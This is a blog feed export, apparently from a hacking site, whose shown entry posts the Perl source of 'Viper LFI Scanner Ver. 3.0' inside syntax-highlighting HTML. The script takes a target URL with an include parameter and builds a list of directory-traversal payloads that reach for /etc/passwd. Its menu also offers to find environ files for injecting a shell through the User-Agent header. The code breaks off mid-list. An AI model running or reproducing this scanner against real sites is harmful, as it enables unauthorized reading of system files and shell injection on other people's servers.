<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-23134681</id><updated>2012-02-08T08:09:55.099+08:00</updated><category term='LOCAL EXPLOIT'/><category term='Puisi'/><category term='shell_PHP'/><category term='Footprinting'/><category term='How To'/><category term='Free Our Mind (FOM)'/><category term='Download'/><category term='visual basic'/><category term='Web-ApHacking'/><category term='Unlock'/><category term='Jailbreak iPhone 4.0'/><category term='Dork'/><category term='Blogger-Trick'/><category term='Papper'/><category term='Manifesto'/><category term='Mirc'/><category term='dump'/><category term='Encryption'/><category term='Windows'/><category term='Password Dump'/><category term='Utilility'/><category term='Movie'/><category term='WirelessSecurity'/><category term='Phyton'/><category term='c#'/><category term='Anime'/><category term='C++'/><category term='Gosip'/><category term='source-code'/><category term='Buku'/><category term='Network Security'/><category term='Politik'/><category term='Bola'/><category term='Tazkirah'/><category term='Virus'/><category term='Haking News'/><category term='Software'/><category term='IP'/><category term='Vpn'/><category term='Link'/><category term='Kisah Teladan'/><category term='Motivasi'/><category term='Android'/><category term='News'/><category term='Premium Account'/><category term='Berita'/><category term='E-book'/><category term='Lulz'/><category term='Mobile'/><category term='POCs'/><category term='Script'/><category term='Backtrack'/><category term='CD Key'/><category term='Course Ethical Hacker'/><category term='Cheat Sheet'/><category term='Tab Gitar'/><category term='Metasploit'/><category term='RAT'/><category term='SQLI'/><category term='Umum'/><category term='Konspirasi'/><category term='Perl'/><category term='Driver'/><category term='tbd'/><category term='Hakin9 Video'/><category term='Program File'/><category term='Sengal'/><category term='Hacking And Cracking'/><category term='FB Pic'/><category term='Carding'/><category term='Hacking Tools'/><category term='Kelab Sahabat Islam'/><category term='PHP'/><category term='Bluetooth® Myth'/><category term='Troller'/><category term='pascal-delphi'/><category term='Viri'/><category term='Joomla'/><category term='Artis Melayu'/><category term='Ruby'/><category term='Lawak'/><category term='Crypter Binder Packers'/><category term='Mac Os'/><category term='Linux'/><category term='Vb.net'/><category term='Haking'/><category term='Hacker Equipment'/><category term='Facebook Topic'/><category term='Paper N Tutorial'/><category term='Cryptography/Encryption/Decryption'/><category term='XSS'/><category term='AnonOpp'/><category term='OS'/><category term='Status Pilihan  Fb'/><title type='text'>Inilah Cerita Kita</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.saifulfaizan.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default?start-index=101&amp;max-results=100'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>981</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-23134681.post-2303358276974205150</id><published>2011-12-21T21:18:00.002+08:00</published><updated>2011-12-21T21:18:30.072+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Perl'/><title type='text'>Viper LFI Scanner Ver. 3.0</title><content type='html'>&lt;pre class="perl" style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: none; background-origin: initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; clear: none; color: seagreen; font-size: 12px; line-height: 1.333; overflow-x: visible; overflow-y: visible; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; white-space: pre-wrap; width: auto;"&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#    ////////////////////////////////////&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#     Viper LFI Scanner Ver. 3.0&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#    ////////////////////////////////////&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Title : Viper Lfi Scanner Ver. 3.0&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Author: Bl4ck.Viper&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# From : Azarbycan&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Date : 2010/08/27&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Category : Scanner&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Home : www.Skote-vahshat.com&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# &lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# Description :Log , Environ , Passwd File Scanner&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#                &lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;# &lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;    &lt;span style="color: black; font-weight: bold;"&gt;use&lt;/span&gt; HTTP&lt;span style="color: #339933;"&gt;::&lt;/span&gt;&lt;span style="color: #006600;"&gt;Request&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: black; font-weight: bold;"&gt;use&lt;/span&gt; LWP&lt;span style="color: #339933;"&gt;::&lt;/span&gt;&lt;span style="color: #006600;"&gt;UserAgent&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cls"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;/////////////////////////////////////////////////&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;    &lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;_________________________________________________&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Viper LFI Scanner Ver. 3.0&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Coded By Bl4ck.Viper&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Made In Azarbycan&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Version In English&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;_________________________________________________&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/sleep.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;sleep&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;1&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; WELCOME&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;menu&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Menu:&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; ID[1]=&amp;gt;Passwd,Log"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Scan Files Of /etc/ Directory]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; ID[2]=&amp;gt;Environ"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;[Scan Environ File For Inject Shell By U-Agent]&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt;&lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Select ID For Start Scanner :"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;$menu&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: #339933;"&gt;&amp;lt;&amp;gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$menu&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/1/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; lfi&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$menu&lt;/span&gt; &lt;span style="color: #339933;"&gt;=~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/2/&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; env&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #b1b100;"&gt;else&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt;&lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Unknow Command&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; menu&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;lfi&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;Welcome To /etc/ Section&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Insert Target (ex: http://www.site.com/index.php?page=)&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt; Target :"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: blue;"&gt;$host&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: #009999;"&gt;&lt;stdin&gt;&lt;/stdin&gt;&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;a href="http://perldoc.perl.org/functions/chomp.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;chomp&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$host&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: #b1b100;"&gt;if&lt;/span&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;$host&lt;/span&gt; &lt;span style="color: #339933;"&gt;!~&lt;/span&gt; &lt;span style="color: #009966; font-style: italic;"&gt;/http:\/\//&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt; &lt;span style="color: #009900;"&gt;{&lt;/span&gt; &lt;span style="color: blue;"&gt;$host&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: red;"&gt;"http://$host"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt; &lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\t&lt;/span&gt;*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: blue;"&gt;@lfi&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;'../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;'../../../../../../../../../../etc/passwd'&lt;/span&gt;&lt;span style="color: 